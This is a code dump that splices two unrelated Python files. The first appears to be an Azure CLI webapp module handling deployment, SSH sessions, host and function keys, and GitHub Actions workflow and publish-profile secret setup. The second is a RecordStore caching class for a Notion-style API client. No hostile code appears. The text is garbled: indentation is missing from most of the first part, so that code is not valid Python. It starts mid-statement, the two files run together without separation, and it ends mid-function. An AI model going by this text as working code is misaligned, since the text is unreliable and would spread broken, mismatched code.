        raise CLIError("An error occurred during deployment. Status Code: {}, Details: {}"
                       .format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
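    # poll the tunnel until the webapp responds; give up after 60 attempts (~1 minute)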
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
try:
c.run('cat /etc/motd', pty=True)
except invoke.exceptions.UnexpectedExit:
# Don't crash over a non-existing /etc/motd.
pass
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
if not instance:
open_page_in_browser(scm_url + '/webssh/host')
else:
open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance))
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='filesystem')
# TODO remove once appservice-kube extension removes
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
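    # override the serialization map so name/value are nested under 'properties', as the host key API expects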
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise ValidationError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
    if app_runtime_info and app_runtime_info['display_name']:
        app_runtime_string = app_runtime_info['display_name']
    github_actions_version = None
    if app_runtime_info and app_runtime_info['github_actions_version']:
        github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
            logger.warning('The app runtime: %s does not match the runtime specified: '
                           '%s. Using the specified runtime %s.', app_runtime_string, runtime, runtime)
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise ValidationError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(cmd=cmd, runtime_string=app_runtime_string, is_linux=is_linux):
raise ValidationError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ValidationError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise ValidationError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
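    # match the 'publish-profile: ${{ secrets.<NAME> }}' line, then strip the wrapper to recover <NAME>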
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise ResourceNotFoundError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
        if runtime_stack == 'java':
            java_container_split = runtime_string.split('|')
            # the container name sits at index 2, so require at least three segments
            if java_container_split and len(java_container_split) >= 3:
                if java_container_split[2] == 'tomcat':
                    runtime_stack = 'tomcat'
                elif java_container_split[2] == 'java se':
                    runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise ResourceNotFoundError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise ResourceNotFoundError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise ValidationError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(cmd, runtime_string, is_linux):
helper = _StackRuntimeHelper(cmd, linux=(is_linux), windows=(not is_linux))
matched_runtime = helper.resolve(runtime_string, is_linux)
if not matched_runtime:
return False
if matched_runtime.github_actions_properties:
return True
return False
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(cmd, app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
# TODO try and get better API support for windows stacks
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
    elif app_runtime and app_runtime.lower() == 'dotnetcore':
        app_runtime_version = ""
        return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux):
helper = _StackRuntimeHelper(cmd, linux=(is_linux), windows=(not is_linux))
if not is_linux:
matched_runtime = helper.resolve("{}|{}".format(app_runtime, app_runtime_version), is_linux)
else:
matched_runtime = helper.resolve(app_runtime, is_linux)
gh_props = None if not matched_runtime else matched_runtime.github_actions_properties
if gh_props:
if gh_props.get("github_actions_version"):
if is_linux:
return {
"display_name": app_runtime,
"github_actions_version": gh_props["github_actions_version"]
}
if gh_props.get("app_runtime_version").lower() == app_runtime_version.lower():
return {
"display_name": app_runtime,
"github_actions_version": gh_props["github_actions_version"]
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
from base64 import b64encode
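    # GitHub's secrets API expects the value sealed with the repository public key (libsodium sealed box) and base64-encoded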
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
def show_webapp(cmd, resource_group_name, name, slot=None): # adding this to not break extensions
return show_app(cmd, resource_group_name, name, slot)
store.py
import datetime
import json
import threading
import uuid
from collections import defaultdict
from copy import deepcopy
from dictdiffer import diff
from inspect import signature
from threading import Lock
from pathlib import Path
from tzlocal import get_localzone
from .logger import logger
from .settings import CACHE_DIR
from .utils import extract_id
class MissingClass(object):
def __bool__(self):
return False
Missing = MissingClass()
class Callback(object):
def __init__(
self, callback, record, callback_id=None, extra_kwargs={}, watch_children=True
):
self.callback = callback
self.record = record
self.callback_id = callback_id or str(uuid.uuid4())
self.extra_kwargs = extra_kwargs
def __call__(self, difference, old_val, new_val):
kwargs = {}
kwargs.update(self.extra_kwargs)
kwargs["record"] = self.record
kwargs["callback_id"] = self.callback_id
kwargs["difference"] = difference
kwargs["changes"] = self.record._convert_diff_to_changelist(
difference, old_val, new_val
)
logger.debug("Firing callback {} with kwargs: {}".format(self.callback, kwargs))
# trim down the parameters we'll be passing, to include only those the callback will accept
params = signature(self.callback).parameters
if not any(["**" in str(param) for param in params.values()]):
# there's no "**kwargs" in the callback signature, so remove any unaccepted params
for arg in list(kwargs.keys()):
if arg not in params:
del kwargs[arg]
# perform the callback, gracefully handling any exceptions
try:
# trigger the callback within its own thread, so it won't block others if it's long-running
threading.Thread(target=self.callback, kwargs=kwargs, daemon=True).start()
except Exception as e:
logger.error(
"Error while processing callback for {}: {}".format(
repr(self.record), repr(e)
)
)
def __eq__(self, val):
if isinstance(val, str):
return self.callback_id.startswith(val)
elif isinstance(val, Callback):
return self.callback_id == val.callback_id
else:
return False
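# Illustrative sketch (not part of the library): Callback.__eq__ treats a string as a
# callback_id prefix, so a list of Callback objects can be searched and pruned with
# plain `in`/`remove` using either a Callback or an id prefix. That is what
# RecordStore.remove_callbacks below relies on. The ids here are hypothetical.
def _example_callback_prefix_matching():
    cb = Callback(callback=lambda **kwargs: None, record=None, callback_id="monitor-page-123")
    registered = [cb]
    assert "monitor-" in registered   # prefix match via Callback.__eq__
    registered.remove("monitor-")     # removes the matching Callback object
    return registered                 # []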
class RecordStore(object):
def __init__(self, client, cache_key=None):
self._mutex = Lock()
self._client = client
self._cache_key = cache_key
self._values = defaultdict(lambda: defaultdict(dict))
self._role = defaultdict(lambda: defaultdict(str))
self._collection_row_ids = {}
self._callbacks = defaultdict(lambda: defaultdict(list))
self._records_to_refresh = {}
self._pages_to_refresh = []
with self._mutex:
self._load_cache()
def _get(self, table, id):
return self._values[table].get(id, Missing)
def add_callback(self, record, callback, callback_id=None, extra_kwargs={}):
assert callable(
callback
), "The callback must be a 'callable' object, such as a function."
self.remove_callbacks(record._table, record.id, callback_id)
callback_obj = Callback(
callback, record, callback_id=callback_id, extra_kwargs=extra_kwargs
)
self._callbacks[record._table][record.id].append(callback_obj)
return callback_obj
def remove_callbacks(self, table, id, callback_or_callback_id_prefix=""):
"""
Remove all callbacks for the record specified by `table` and `id` that have a callback_id
starting with the string `callback_or_callback_id_prefix`, or are equal to the provided callback.
"""
if callback_or_callback_id_prefix is None:
return
callbacks = self._callbacks[table][id]
while callback_or_callback_id_prefix in callbacks:
callbacks.remove(callback_or_callback_id_prefix)
def _get_cache_path(self, attribute):
return str(
Path(CACHE_DIR).joinpath("{}{}.json".format(self._cache_key, attribute))
)
def _load_cache(self, attributes=("_values", "_role", "_collection_row_ids")):
if not self._cache_key:
return
for attr in attributes:
try:
with open(self._get_cache_path(attr)) as f:
if attr == "_collection_row_ids":
self._collection_row_ids.update(json.load(f))
else:
for k, v in json.load(f).items():
getattr(self, attr)[k].update(v)
except (FileNotFoundError, ValueError):
pass
def set_collection_rows(self, collection_id, row_ids):
if collection_id in self._collection_row_ids:
old_ids = set(self._collection_row_ids[collection_id])
new_ids = set(row_ids)
added = new_ids - old_ids
removed = old_ids - new_ids
for id in added:
self._trigger_callbacks(
"collection",
collection_id,
[("row_added", "rows", id)],
old_ids,
new_ids,
)
for id in removed:
self._trigger_callbacks(
"collection",
collection_id,
[("row_removed", "rows", id)],
old_ids,
new_ids,
)
self._collection_row_ids[collection_id] = row_ids
self._save_cache("_collection_row_ids")
def get_collection_rows(self, collection_id):
return self._collection_row_ids.get(collection_id, [])
def _save_cache(self, attribute):
if not self._cache_key:
return
with open(self._get_cache_path(attribute), "w") as f:
json.dump(getattr(self, attribute), f)
def _trigger_callbacks(self, table, id, difference, old_val, new_val):
for callback_obj in self._callbacks[table][id]:
callback_obj(difference, old_val, new_val)
def get_role(self, table, id, force_refresh=False):
self.get(table, id, force_refresh=force_refresh)
return self._role[table].get(id, None)
def get(self, table, id, force_refresh=False):
id = extract_id(id)
# look up the record in the current local dataset
result = self._get(table, id)
# if it's not found, try refreshing the record from the server
if result is Missing or force_refresh:
if table == "block":
self.call_load_page_chunk(id)
else:
self.call_get_record_values(**{table: id})
result = self._get(table, id)
return result if result is not Missing else None
def _update_record(self, table, id, value=None, role=None):
callback_queue = []
with self._mutex:
if role:
logger.debug("Updating 'role' for {}/{} to {}".format(table, id, role))
self._role[table][id] = role
self._save_cache("_role")
if value:
logger.debug(
"Updating 'value' for {}/{} to {}".format(table, id, value)
)
old_val = self._values[table][id]
difference = list(
diff(
old_val,
value,
ignore=["version", "last_edited_time", "last_edited_by"],
expand=True,
)
)
self._values[table][id] = value
self._save_cache("_values")
if old_val and difference:
logger.debug("Value changed! Difference: {}".format(difference))
callback_queue.append((table, id, difference, old_val, value))
# run callbacks outside the mutex to avoid lockups
for cb in callback_queue:
self._trigger_callbacks(*cb)
def call_get_record_values(self, **kwargs):
"""
        Call the server's getRecordValues endpoint to update the local record store. The keyword
        arguments map table names to a list of record IDs (or a single ID) to load for that table.
        Pass True to refresh all known records for that table.
"""
requestlist = []
for table, ids in kwargs.items():
# ensure "ids" is a proper list
if ids is True:
ids = list(self._values.get(table, {}).keys())
if isinstance(ids, str):
ids = [ids]
# if we're in a transaction, add the requested IDs to a queue to refresh when the transaction completes
if self._client.in_transaction():
self._records_to_refresh[table] = list(
set(self._records_to_refresh.get(table, []) + ids)
)
continue
requestlist += [{"table": table, "id": extract_id(id)} for id in ids]
if requestlist:
logger.debug(
"Calling 'getRecordValues' endpoint for requests: {}".format(
requestlist
)
)
results = self._client.post(
"getRecordValues", {"requests": requestlist}
).json()["results"]
for request, result in zip(requestlist, results):
self._update_record(
request["table"],
request["id"],
value=result.get("value"),
role=result.get("role"),
)
def get_current_version(self, table, id):
values = self._get(table, id)
if values and "version" in values:
return values["version"]
else:
return -1
def call_load_page_chunk(self, page_id):
if self._client.in_transaction():
self._pages_to_refresh.append(page_id)
return
data = {
"pageId": page_id,
"limit": 100000,
"cursor": {"stack": []},
"chunkNumber": 0,
"verticalColumns": False,
}
recordmap = self._client.post("loadPageChunk", data).json()["recordMap"]
self.store_recordmap(recordmap)
def store_recordmap(self, recordmap):
for table, records in recordmap.items():
for id, record in records.items():
self._update_record(
table, id, value=record.get("value"), role=record.get("role")
)
def call_query_collection(
self,
collection_id,
collection_view_id,
search="",
type="table",
aggregate=[],
aggregations=[],
filter={},
sort=[],
calendar_by="",
group_by="",
):
assert not (aggregate and aggregations), "Use only one of `aggregate` or `aggregations` (old vs new format)"
# convert singletons into lists if needed
if isinstance(aggregate, dict):
aggregate = [aggregate]
if isinstance(sort, dict):
sort = [sort]
data = {
"collectionId": collection_id,
"collectionViewId": collection_view_id,
"loader": {
"limit": 10000,
"loadContentCover": True,
"searchQuery": search,
"userLocale": "en",
"userTimeZone": str(get_localzone()),
"type": type,
},
"query": {
"aggregate": aggregate,
"aggregations": aggregations,
"filter": filter,
"sort": sort,
},
}
